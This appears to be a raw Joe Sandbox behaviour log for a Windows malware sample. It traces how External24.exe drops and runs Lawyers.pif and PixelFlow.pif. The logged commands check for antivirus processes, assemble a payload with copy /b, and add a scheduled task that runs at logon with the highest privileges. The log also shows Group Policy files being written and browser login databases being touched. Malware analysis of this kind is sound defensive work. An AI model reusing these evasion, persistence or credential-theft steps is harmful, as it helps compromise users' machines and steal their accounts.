Source: C:\Users\user\Desktop\External24.exe	Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,	0_2_004038AF
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006655E5 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	15_2_006655E5
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006C55E5 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	21_2_006C55E5

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File created: C:\Windows\SysWOW64\GroupPolicy\gpt.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File created: C:\Windows\System32\GroupPolicy\Machine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File created: C:\Windows\System32\GroupPolicy\User	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File created: C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File created: C:\Windows\System32\GroupPolicy\GPT.INI	Jump to behavior

Source: C:\Users\user\Desktop\External24.exe	Code function: 0_2_0040737E	0_2_0040737E
Source: C:\Users\user\Desktop\External24.exe	Code function: 0_2_00406EFE	0_2_00406EFE
Source: C:\Users\user\Desktop\External24.exe	Code function: 0_2_004079A2	0_2_004079A2
Source: C:\Users\user\Desktop\External24.exe	Code function: 0_2_004049A8	0_2_004049A8
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0060B020	15_2_0060B020
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006094E0	15_2_006094E0
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00609C80	15_2_00609C80
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006881C8	15_2_006881C8
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00622325	15_2_00622325
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00636432	15_2_00636432
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0063258E	15_2_0063258E
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0060E6F0	15_2_0060E6F0
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0062275A	15_2_0062275A
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00680802	15_2_00680802
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006388EF	15_2_006388EF
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006369A4	15_2_006369A4
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00610BE0	15_2_00610BE0
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0065EB95	15_2_0065EB95
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00680C7F	15_2_00680C7F
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00668CB1	15_2_00668CB1
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0062CC81	15_2_0062CC81
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00636F16	15_2_00636F16
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006232E9	15_2_006232E9
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0062F339	15_2_0062F339
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0061D457	15_2_0061D457
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0061F57E	15_2_0061F57E
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006215E4	15_2_006215E4
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00601663	15_2_00601663
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0060F6A0	15_2_0060F6A0
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006277F3	15_2_006277F3
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0062DAD5	15_2_0062DAD5
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00621AD8	15_2_00621AD8
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00639C15	15_2_00639C15
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0061DD14	15_2_0061DD14
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00621EF0	15_2_00621EF0
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0062BF06	15_2_0062BF06
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006E81C8	21_2_006E81C8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00682325	21_2_00682325
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00696432	21_2_00696432
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0069258E	21_2_0069258E
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0066E6F0	21_2_0066E6F0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068275A	21_2_0068275A
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006E0802	21_2_006E0802
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006988EF	21_2_006988EF
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006969A4	21_2_006969A4
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00670BE0	21_2_00670BE0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006BEB95	21_2_006BEB95
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006E0C7F	21_2_006E0C7F
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006C8CB1	21_2_006C8CB1
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068CC81	21_2_0068CC81
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00696F16	21_2_00696F16
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0066B020	21_2_0066B020
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006832E9	21_2_006832E9
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068F339	21_2_0068F339
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0067D457	21_2_0067D457
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006694E0	21_2_006694E0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0067F57E	21_2_0067F57E
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006815E4	21_2_006815E4
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00661663	21_2_00661663
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0066F6A0	21_2_0066F6A0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006877F3	21_2_006877F3
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00681AD8	21_2_00681AD8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068DAD5	21_2_0068DAD5
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00699C15	21_2_00699C15
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00669C80	21_2_00669C80
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0067DD14	21_2_0067DD14
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00681EF0	21_2_00681EF0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068BF06	21_2_0068BF06
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C100A0	21_2_00C100A0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B9002D	21_2_00B9002D
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C5A2B0	21_2_00C5A2B0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B5A2C0	21_2_00B5A2C0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BFA200	21_2_00BFA200
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BF6250	21_2_00BF6250
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C0E3C0	21_2_00C0E3C0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BE63B0	21_2_00BE63B0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C084D0	21_2_00C084D0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C4A480	21_2_00C4A480
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C2E430	21_2_00C2E430
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C64550	21_2_00C64550
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BE86B0	21_2_00BE86B0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C306D0	21_2_00C306D0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BE0600	21_2_00BE0600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BF88B0	21_2_00BF88B0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C4A930	21_2_00C4A930
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C34BD0	21_2_00C34BD0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C4AD00	21_2_00C4AD00
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BEAF60	21_2_00BEAF60
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BEF0D0	21_2_00BEF0D0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C2F030	21_2_00C2F030
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BED3A0	21_2_00BED3A0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C8F550	21_2_00C8F550
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C03600	21_2_00C03600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C27600	21_2_00C27600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C01630	21_2_00C01630
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BE5790	21_2_00BE5790
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B5B8E0	21_2_00B5B8E0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BFDB20	21_2_00BFDB20
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B59C90	21_2_00B59C90
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BD1C10	21_2_00BD1C10
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C47D00	21_2_00C47D00
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C11F20	21_2_00C11F20
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BE3F40	21_2_00BE3F40
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C720D0	21_2_00C720D0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C460E0	21_2_00C460E0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BD611D	21_2_00BD611D
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C3E170	21_2_00C3E170
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BF4320	21_2_00BF4320
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B9036F	21_2_00B9036F
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C40450	21_2_00C40450
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C485F0	21_2_00C485F0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BD45E0	21_2_00BD45E0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BA47BF	21_2_00BA47BF
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C42820	21_2_00C42820
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B8A928	21_2_00B8A928
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C96970	21_2_00C96970
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B8C960	21_2_00B8C960
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BA8BB0	21_2_00BA8BB0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C48B40	21_2_00C48B40
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C3EC40	21_2_00C3EC40
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C84D40	21_2_00C84D40
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C96D20	21_2_00C96D20
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C56EA0	21_2_00C56EA0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C66EA0	21_2_00C66EA0

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif 8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif 8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: String function: 00628A60 appears 42 times
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: String function: 00611A36 appears 34 times
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: String function: 00620C42 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: String function: 00C97510 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: String function: 00671A36 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: String function: 00680C42 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: String function: 00B6ACE0 appears 92 times
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: String function: 00B84380 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: String function: 00688A60 appears 42 times
Source: C:\Users\user\Desktop\External24.exe	Code function: String function: 004062CF appears 57 times

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00658BCC AdjustTokenPrivileges,CloseHandle,	15_2_00658BCC
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0065917C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	15_2_0065917C
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006B8BCC AdjustTokenPrivileges,CloseHandle,	21_2_006B8BCC
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006B917C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	21_2_006B917C

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Mutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2663
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: Lawyers.pif, Lawyers.pif, 00000015.00000002.3501008072.0000000000B50000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Lawyers.pif, 00000015.00000002.3501008072.0000000000B50000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: LrsRpbnZnzPmLogin Data For Account.21.dr, m5Mie8xKwOWILogin Data.21.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Users\user\Desktop\External24.exe "C:\Users\user\Desktop\External24.exe"
Source: C:\Users\user\Desktop\External24.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Forgot Forgot.cmd & Forgot.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 292668
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "towersallowancemeaninghelp" Wine
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Therefore + Physical + Inflation + Inspections + Sharon + Lung + Appearance + Warming + Army + Latinas + Anytime + Wiley + Zoning + Cincinnati + Accidents + Helena 292668\r
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif 292668\Lawyers.pif 292668\r
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 15
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "PixelFlow" /tr "wscript //B 'C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif" "C:\Users\user\AppData\Local\PixelFlow Creations\m"
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Process created: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
Source: C:\Users\user\Desktop\External24.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Forgot Forgot.cmd & Forgot.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 292668	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "towersallowancemeaninghelp" Wine	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Therefore + Physical + Inflation + Inspections + Sharon + Lung + Appearance + Warming + Army + Latinas + Anytime + Wiley + Zoning + Cincinnati + Accidents + Helena 292668\r	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif 292668\Lawyers.pif 292668\r	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 15	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "PixelFlow" /tr "wscript //B 'C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js'" /sc onlogon /F /RL HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Process created: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif" "C:\Users\user\AppData\Local\PixelFlow Creations\m"	Jump to behavior

Source: C:\Users\user\Desktop\External24.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
